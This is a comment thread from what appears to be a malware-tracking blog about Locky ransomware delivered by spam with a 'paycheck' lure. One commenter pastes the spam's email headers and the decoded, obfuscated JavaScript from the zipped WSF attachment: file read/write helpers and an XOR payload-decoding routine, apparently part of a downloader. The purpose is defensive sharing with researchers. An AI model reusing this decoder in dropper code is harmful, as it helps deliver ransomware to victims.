Comments

attached is the paycheck for your next months salary in advance malspam delivers Locky — 2 Comments

  1. We’re getting

    Received: from hp-PC (unknown [197.129.92.8])
    From: “Alice” <Alice66999@>
    To:
    Date: Tue, 30 Aug 2016 23:07:54 +0100
    Subject: FW: [Scan] 2016-08-13 14:21:31
    Date: Tue, 30 Aug 2016 23:07:54 +0100

    With a zipped wsf file
    the wsf file contains base64 encoded content which unravels to

    alkotesterzercerLOBIKrtfta(filePath)
    {
    var alkotesterzercerUIIHHAAArosteks=new ActiveXObject(“ADODB.Stream”);
    alkotesterzercerUIIHHAAArosteks[“type”]=2;
    alkotesterzercerUIIHHAAArosteks[“Charset”]=437;
    alkotesterzercerUIIHHAAArosteks[“open”]();
    alkotesterzercerUIIHHAAArosteks[“LoadFromFile”](filePath);
    var fileString=alkotesterzercerUIIHHAAArosteks[“ReadText”];
    alkotesterzercerUIIHHAAArosteks[“close”]();
    return alkotesterzercerLOBIKfsta(fileString);
    };
    function alkotesterzercerLOBIKfsta(fileString)
    {
    var t1=new Array();

    t1[0xC7]=0x80;t1[0xFC]=0x81;t1[0xE9]=0x82;t1[0xE2]=0x83;t1[0xE4]=0x84;t1[0xE0]=0x85;t1[0xE5]=0x86;t1[0xE7]=0x87;t1[0xEA]=0x88;t1[0xEB]=0x89;t1[0xE8]=0x8A;t1[0xEF]=0x8B;t1[0xEE]=0x8C;t1[0xEC]=0x8D;t1[0xC4]=0x8E;t1[0xC5]=0x8F;t1[0xC9]=0x90;t1[0xE6]=0x91;t1[0xC6]=0x92;t1[0xF4]=0x93;t1[0xF6]=0x94;t1[0xF2]=0x95;t1[0xFB]=0x96;t1[0xF9]=0x97;t1[0xFF]=0x98;t1[0xD6]=0x99;t1[0xDC]=0x9A;t1[0xA2]=0x9B;t1[0xA3]=0x9C;t1[0xA5]=0x9D;t1[0x20A7]=0x9E;t1[0x192]=0x9F;t1[0xE1]=0xA0;t1[0xED]=0xA1;t1[0xF3]=0xA2;t1[0xFA]=0xA3;t1[0xF1]=0xA4;t1[0xD1]=0xA5;t1[0xAA]=0xA6;t1[0xBA]=0xA7;t1[0xBF]=0xA8;t1[0x2310]=0xA9;t1[0xAC]=0xAA;t1[0xBD]=0xAB;t1[0xBC]=0xAC;t1[0xA1]=0xAD;t1[0xAB]=0xAE;t1[0xBB]=0xAF;t1[0x2591]=0xB0;t1[0x2592]=0xB1;t1[0x2593]=0xB2;t1[0x2502]=0xB3;t1[0x2524]=0xB4;t1[0x2561]=0xB5;t1[0x2562]=0xB6;t1[0x2556]=0xB7;t1[0x2555]=0xB8;t1[0x2563]=0xB9;t1[0x2551]=0xBA;t1[0x2557]=0xBB;t1[0x255D]=0xBC;t1[0x255C]=0xBD;t1[0x255B]=0xBE;t1[0x2510]=0xBF;t1[0x2514]=0xC0;t1[0x2534]=0xC1;t1[0x252C]=0xC2;t1[0x251C]=0xC3;
    t1[0x2500]=0xC4;t1[0x253C]=0xC5;t1[0x255E]=0xC6;t1[0x255F]=0xC7;t1[0x255A]=0xC8;t1[0x2554]=0xC9;t1[0x2569]=0xCA;t1[0x2566]=0xCB;t1[0x2560]=0xCC;t1[0x2550]=0xCD;t1[0x256C]=0xCE;t1[0x2567]=0xCF;t1[0x2568]=0xD0;t1[0x2564]=0xD1;t1[0x2565]=0xD2;t1[0x2559]=0xD3;t1[0x2558]=0xD4;t1[0x2552]=0xD5;t1[0x2553]=0xD6;t1[0x256B]=0xD7;t1[0x256A]=0xD8;t1[0x2518]=0xD9;t1[0x250C]=0xDA;t1[0x2588]=0xDB;t1[0x2584]=0xDC;t1[0x258C]=0xDD;t1[0x2590]=0xDE;t1[0x2580]=0xDF;t1[0x3B1]=0xE0;t1[0xDF]=0xE1;t1[0x393]=0xE2;t1[0x3C0]=0xE3;t1[0x3A3]=0xE4;t1[0x3C3]=0xE5;t1[0xB5]=0xE6;t1[0x3C4]=0xE7;t1[0x3A6]=0xE8;t1[0x398]=0xE9;t1[0x3A9]=0xEA;t1[0x3B4]=0xEB;
    t1[0x221E]=0xEC;t1[0x3C6]=0xED;t1[0x3B5]=0xEE;t1[0x2229]=0xEF;t1[0x2261]=0xF0;t1[0xB1]=0xF1;t1[0x2265]=0xF2;t1[0x2264]=0xF3;t1[0x2320]=0xF4;t1[0x2321]=0xF5;t1[0xF7]=0xF6;t1[0x2248]=0xF7;t1[0xB0]=0xF8;t1[0x2219]=0xF9;t1[0xB7]=0xFA;t1[0x221A]=0xFB;t1[0x207F]=0xFC;t1[0xB2]=0xFD;t1[0x25A0]=0xFE;t1[0xA0]=0xFF;

    var resultArray=new Array();
    for (var Tj=0; Tj < fileString["length"]; Tj++)
    {
    var OVc9=fileString["charCodeAt"](Tj);
    if (OVc9 < 128)
    {var HIi3=OVc9;}
    else
    {var HIi3=t1[OVc9];}
    resultArray["push"](HIi3);
    };

    return resultArray /* y */;
    };
    function alkotesterzercerLOBIKfats(codeArray)
    {
    var t2=new Array();

    t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;

    var EGj=new Array();
    var resultString="";
    var HIi3; var OVc9;
    for (var Tj=0; Tj < codeArray["length"]; Tj++)
    {
    HIi3=codeArray[Tj];
    if (HIi3 < 128)
    {OVc9=HIi3;}
    else
    {OVc9=t2[HIi3];}
    EGj.push(String["fromCharCode"](OVc9));
    }

    resultString=EGj["join"]("");

    return resultString;
    };
    function alkotesterzercerLOBIKsatt(filePath, codeArray)
    {
    var alkotesterzercerUIIHHAAArosteks=new ActiveXObject("ADODB.Stream");
    alkotesterzercerUIIHHAAArosteks["type"]=2;
    alkotesterzercerUIIHHAAArosteks["Charset"]=437;
    alkotesterzercerUIIHHAAArosteks["open"]();
    alkotesterzercerUIIHHAAArosteks["writeText"](alkotesterzercerLOBIKfats(codeArray));
    alkotesterzercerUIIHHAAArosteks["SaveToFile"](filePath, 2);
    alkotesterzercerUIIHHAAArosteks["close"]();
    };

    function alkotesterzercerLOBIKxdac(alkotesterzercerLOBIKcca)
    {
    for (var Tj=0; Tj < alkotesterzercerLOBIKcca["length"]; Tj++)
    {
    alkotesterzercerLOBIKcca[Tj] ^= alkotesterzercerTRAxKey[Math.floor(Tj % alkotesterzercerTRAxKey.length)];
    }
    return alkotesterzercerLOBIKcca;
    };

    I have not decoded the unicode/ascii yet.
    I have this posted to pastebin and the wsf to Kaspersky

Leave a Reply

Your email address will not be published. Required fields are marked *